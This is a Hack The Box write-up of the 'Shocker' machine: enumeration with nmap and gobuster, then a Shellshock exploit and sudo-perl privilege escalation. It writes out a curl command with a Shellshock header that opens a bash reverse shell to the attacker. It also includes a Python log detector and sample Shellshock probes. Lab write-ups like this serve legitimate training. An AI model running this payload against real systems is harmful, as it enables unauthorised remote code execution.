Hack The Box - Shocker Walkthrough without Metasploit

Shocker is a Linux box rated as easy. Using a few enumeration techniques and a well-known Bash vulnerability we get a foothold, and from there we escalate privileges by abusing a binary we are allowed to run with sudo.

Enumeration

First we run nmap (in our case through nmapAutomator.sh, a script that performs some basic enumeration of the target). Two ports are open: 80 (HTTP) and 2222 (SSH).

nmapAutomator.sh 10.10.10.56 All

or
nmap -sC -sV 10.10.10.56

Since port 80 (HTTP) is open we run Gobuster:

We ran gobuster with the options dir, -u (URL), -w (wordlist) and -t (threads); since we are on a pentesting platform and not in the real world we can use 40 threads.

gobuster dir -u 10.10.10.56 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 40

We tried another wordlist, this time big.txt from /usr/share/dirb/wordlists on our Kali machine, and found index.html and /cgi-bin/.

Since we found a cgi-bin folder we run Gobuster again, this time with two new flags:

-x to indicate extensions to look for

-e to show full path

gobuster dir -u http://10.10.10.56:80/cgi-bin/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 20 -x php,db,txt,html,sh -e

This output is really interesting: there is a shell script in cgi-bin, which means we can attempt a Shellshock attack.

Exploitation

We are going to perform a Shellshock attack (CVE-2014-6271), a Bash vulnerability that allows RCE (Remote Code Execution) without authentication. Windows is not affected by this vulnerability, but since a great percentage of the internet runs on Apache servers, and the majority of those run on Linux (just like our victim does)...

We send the string () { :; }; to the target in an HTTP header. A CGI script passes request headers to its handler as environment variables, and a vulnerable Bash interprets a variable whose value starts with () { as a function definition.

Because of the bug, Bash does not stop at the end of that (empty) function definition: it keeps parsing and executes whatever follows the closing };, so we place a Bash reverse shell after it.

With that in mind we send a curl to our victim:

curl -H "user-agent: () { :; }; echo; /bin/bash -c 'bash -i >& /dev/tcp/<our-ip>/port 0>&1'" http://10.10.10.56/cgi-bin/user.sh
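From the defender's side, the same request leaves a very recognisable trace: the header value starting with () { ends up in the web server's access log. The following detector, an added example that is not part of the original walkthrough, parses Apache combined-format log lines (constructed samples, with a harmless payload) and flags Shellshock probes aimed at CGI scripts.

```python
import re

# Constructed Apache "combined" log lines; the attacker IP, timestamps and
# payloads are made up for this example.
SAMPLE_LOG = """\
10.10.14.5 - - [20/Jan/2020:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 137 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Jan/2020:10:01:07 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 118 "-" "Mozilla/5.0"
10.10.14.5 - - [20/Jan/2020:10:01:09 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "() { :; }; /bin/bash -c 'id'"
10.10.14.5 - - [20/Jan/2020:10:01:11 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 0 "-" "(){:;}; /bin/true"
"""

# Apache combined log format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Shellshock marker: a function definition "() {" at the start of a header value.
# Deliberately tolerant of spacing variations; tune it if it is too noisy.
SHELLSHOCK_RE = re.compile(r'\(\s*\)\s*\{')


def is_shellshock_probe(header_value):
    """True if a logged header value carries the Shellshock function prefix."""
    return bool(SHELLSHOCK_RE.search(header_value))


def find_shellshock_attempts(log_text):
    """Return one record per log line whose Referer or User-Agent carries the marker."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        if is_shellshock_probe(m['ua']) or is_shellshock_probe(m['referer']):
            hits.append({
                'ip': m['ip'],
                'path': m['path'],
                # CGI paths are where the injected variable actually reaches Bash
                'cgi': m['path'].startswith('/cgi-bin/'),
                'ua': m['ua'],
            })
    return hits


if __name__ == '__main__':
    for hit in find_shellshock_attempts(SAMPLE_LOG):
        print(f"{hit['ip']} -> {hit['path']} (cgi={hit['cgi']}): {hit['ua']}")
```

Only headers the server actually logs are visible this way; a payload sent in a header that is not logged (Cookie, Host, a custom header) needs a web application firewall or full request capture to be seen.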

Privilege Escalation

Once we are inside we enumerate again, this time from within the box. Our very first command, sudo -l (which lists the commands we are allowed to run with sudo), already gives us some great results.

With this information we go to GTFOBins and search for perl, since we can run /usr/bin/perl as root with sudo:

Pwnd

Since the box has Python3 we can spawn a tty shell with it:

python3 -c 'import pty;pty.spawn("/bin/bash")'
